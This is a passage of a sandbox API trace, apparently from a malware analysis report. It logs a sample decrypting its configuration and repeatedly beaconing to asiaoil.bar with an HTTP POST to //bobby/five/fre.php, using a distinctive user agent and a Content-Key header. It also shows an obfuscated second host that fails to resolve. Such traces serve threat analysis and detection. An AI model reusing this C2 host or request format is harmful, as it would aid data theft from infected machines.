(lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0305.403] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.404] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0305.404] GetProcessHeap () returned 0x740000 [0305.404] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0305.404] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0305.404] GetProcessHeap () returned 0x740000 [0305.404] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0305.405] GetProcessHeap () returned 0x740000 [0305.405] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766138 | out: hHeap=0x740000) returned 1 [0305.405] GetProcessHeap () returned 0x740000 [0305.405] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763b30 | out: hHeap=0x740000) returned 1 [0305.405] GetProcessHeap () returned 0x740000 [0305.405] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763b30 [0305.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.407] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0305.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.414] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d210) returned 1 [0305.422] GetProcessHeap () returned 0x740000 [0305.422] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x7584a8 [0305.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.424] CryptImportKey (in: hProv=0x75d210, pbData=0x7584a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0305.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.425] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0305.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.426] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0305.426] GetProcessHeap () returned 0x740000 [0305.427] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7584a8 | out: hHeap=0x740000) returned 1 [0305.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.428] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763b30, pdwDataLen=0x19fcfc | out: pbData=0x763b30, pdwDataLen=0x19fcfc) returned 1 [0305.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.429] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0305.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.430] CryptReleaseContext (hProv=0x75d210, dwFlags=0x0) returned 1 [0305.430] GetProcessHeap () returned 0x740000 [0305.430] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765898 [0305.431] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.432] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0305.432] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.433] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0305.433] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.434] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0305.435] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.435] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0305.435] GetProcessHeap () returned 0x740000 [0305.435] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0305.435] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2b0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bdf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0305.479] GetProcessHeap () returned 0x740000 [0305.479] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b610 [0305.479] socket (af=2, type=1, protocol=6) returned 0x2bc [0305.480] connect (s=0x2bc, name=0x75c2b0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0305.503] FreeAddrInfoW (pAddrInfo=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2b0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bdf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0305.503] GetProcessHeap () returned 0x740000 [0305.503] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75cee0 [0305.503] GetProcessHeap () returned 0x740000 [0305.503] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0305.504] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0305.505] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0305.505] GetProcessHeap () returned 0x740000 [0305.505] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0305.505] GetProcessHeap () returned 0x740000 [0305.505] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0305.505] GetProcessHeap () returned 0x740000 [0305.506] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763938 [0305.506] GetProcessHeap () returned 0x740000 [0305.506] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0305.506] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0305.507] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0305.507] GetProcessHeap () returned 0x740000 [0305.507] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0305.507] GetProcessHeap () returned 0x740000 [0305.508] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0305.508] send (s=0x2bc, buf=0x747928*, len=243, flags=0) returned 243 [0305.512] send (s=0x2bc, buf=0x761fd0*, len=159, flags=0) returned 159 [0305.512] GetProcessHeap () returned 0x740000 [0305.512] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0305.512] recv (in: s=0x2bc, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 567 [0305.631] GetProcessHeap () returned 0x740000 [0305.632] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0305.632] GetProcessHeap () returned 0x740000 [0305.633] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763938 | out: hHeap=0x740000) returned 1 [0305.633] GetProcessHeap () returned 0x740000 [0305.633] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0305.633] GetProcessHeap () returned 0x740000 [0305.634] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75cee0 | out: hHeap=0x740000) returned 1 [0305.634] closesocket (s=0x2bc) returned 0 [0305.634] GetProcessHeap () returned 0x740000 [0305.634] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b610 | out: hHeap=0x740000) returned 1 [0305.634] GetProcessHeap () returned 0x740000 [0305.635] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765898 | out: hHeap=0x740000) returned 1 [0305.635] GetProcessHeap () returned 0x740000 [0305.635] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763b30 | out: hHeap=0x740000) returned 1 [0305.635] GetProcessHeap () returned 0x740000 [0305.635] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0305.635] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1068) returned 0x2bc [0305.637] Sleep (dwMilliseconds=0xea60) [0305.638] GetProcessHeap () returned 0x740000 [0305.638] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763ed8 [0305.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.639] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0305.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.645] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d7e8) returned 1 [0305.666] GetProcessHeap () returned 0x740000 [0305.667] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0305.667] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.668] CryptImportKey (in: hProv=0x75d7e8, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0305.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.669] CryptSetKeyParam (hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0305.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.670] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0305.670] GetProcessHeap () returned 0x740000 [0305.670] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0305.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.671] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763ed8, pdwDataLen=0x19fcfc | out: pbData=0x763ed8, pdwDataLen=0x19fcfc) returned 1 [0305.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.672] CryptDestroyKey (hKey=0x74d368) returned 1 [0305.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.673] CryptReleaseContext (hProv=0x75d7e8, dwFlags=0x0) returned 1 [0305.673] GetProcessHeap () returned 0x740000 [0305.673] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765f10 [0305.674] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.674] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0305.675] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.675] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0305.676] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.676] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0305.677] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.677] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0305.678] GetProcessHeap () returned 0x740000 [0305.678] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c020 [0305.678] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0305.678] GetProcessHeap () returned 0x740000 [0305.678] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c020 | out: hHeap=0x740000) returned 1 [0305.679] GetProcessHeap () returned 0x740000 [0305.679] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765f10 | out: hHeap=0x740000) returned 1 [0305.679] GetProcessHeap () returned 0x740000 [0305.680] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763ed8 | out: hHeap=0x740000) returned 1 [0305.680] GetProcessHeap () returned 0x740000 [0305.680] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763f20 [0305.680] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.738] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0305.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.747] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d540) returned 1 [0305.759] GetProcessHeap () returned 0x740000 [0305.759] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0305.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.760] CryptImportKey (in: hProv=0x75d540, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0305.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.762] CryptSetKeyParam (hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0305.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.763] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0305.763] GetProcessHeap () returned 0x740000 [0305.763] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0305.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.765] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763f20, pdwDataLen=0x19fcfc | out: pbData=0x763f20, pdwDataLen=0x19fcfc) returned 1 [0305.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.766] CryptDestroyKey (hKey=0x74d368) returned 1 [0305.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0305.767] CryptReleaseContext (hProv=0x75d540, dwFlags=0x0) returned 1 [0305.767] GetProcessHeap () returned 0x740000 [0305.767] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765ce8 [0305.768] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.768] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0305.769] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.770] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0305.771] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.771] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0305.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0305.772] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0305.772] GetProcessHeap () returned 0x740000 [0305.772] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bf58 [0305.772] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c208*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0305.810] GetProcessHeap () returned 0x740000 [0305.810] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b4f0 [0305.810] socket (af=2, type=1, protocol=6) returned 0x2c0 [0305.810] connect (s=0x2c0, name=0x75c208*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0305.836] FreeAddrInfoW (pAddrInfo=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c208*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0305.836] GetProcessHeap () returned 0x740000 [0305.836] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d7e8 [0305.836] GetProcessHeap () returned 0x740000 [0305.836] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0305.837] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0305.838] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0305.838] GetProcessHeap () returned 0x740000 [0305.838] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0305.838] GetProcessHeap () returned 0x740000 [0305.839] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0305.839] GetProcessHeap () returned 0x740000 [0305.839] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763740 [0305.839] GetProcessHeap () returned 0x740000 [0305.839] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0305.840] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0305.841] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0305.841] GetProcessHeap () returned 0x740000 [0305.841] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0305.841] GetProcessHeap () returned 0x740000 [0305.841] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0305.841] send (s=0x2c0, buf=0x747928*, len=243, flags=0) returned 243 [0305.842] send (s=0x2c0, buf=0x761fd0*, len=159, flags=0) returned 159 [0305.842] GetProcessHeap () returned 0x740000 [0305.842] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0305.842] recv (in: s=0x2c0, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 569 [0306.000] GetProcessHeap () returned 0x740000 [0306.001] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0306.001] GetProcessHeap () returned 0x740000 [0306.001] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763740 | out: hHeap=0x740000) returned 1 [0306.002] GetProcessHeap () returned 0x740000 [0306.002] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0306.002] GetProcessHeap () returned 0x740000 [0306.003] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d7e8 | out: hHeap=0x740000) returned 1 [0306.003] closesocket (s=0x2c0) returned 0 [0306.004] GetProcessHeap () returned 0x740000 [0306.004] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4f0 | out: hHeap=0x740000) returned 1 [0306.004] GetProcessHeap () returned 0x740000 [0306.004] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765ce8 | out: hHeap=0x740000) returned 1 [0306.004] GetProcessHeap () returned 0x740000 [0306.004] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763f20 | out: hHeap=0x740000) returned 1 [0306.004] GetProcessHeap () returned 0x740000 [0306.004] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bf58 | out: hHeap=0x740000) returned 1 [0306.006] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x106c) returned 0x2c0 [0306.008] Sleep (dwMilliseconds=0xea60) [0306.009] GetProcessHeap () returned 0x740000 [0306.009] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763860 [0306.010] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.010] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0306.015] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.016] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d298) returned 1 [0306.023] GetProcessHeap () returned 0x740000 [0306.023] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0306.023] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.024] CryptImportKey (in: hProv=0x75d298, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0306.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.025] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0306.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.026] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0306.026] GetProcessHeap () returned 0x740000 [0306.026] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0306.048] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.049] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763860, pdwDataLen=0x19fcfc | out: pbData=0x763860, pdwDataLen=0x19fcfc) returned 1 [0306.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.050] CryptDestroyKey (hKey=0x74d768) returned 1 [0306.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.050] CryptReleaseContext (hProv=0x75d298, dwFlags=0x0) returned 1 [0306.050] GetProcessHeap () returned 0x740000 [0306.050] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x7669d8 [0306.051] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0306.051] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0306.052] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0306.052] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0306.053] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0306.053] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0306.054] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0306.054] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") 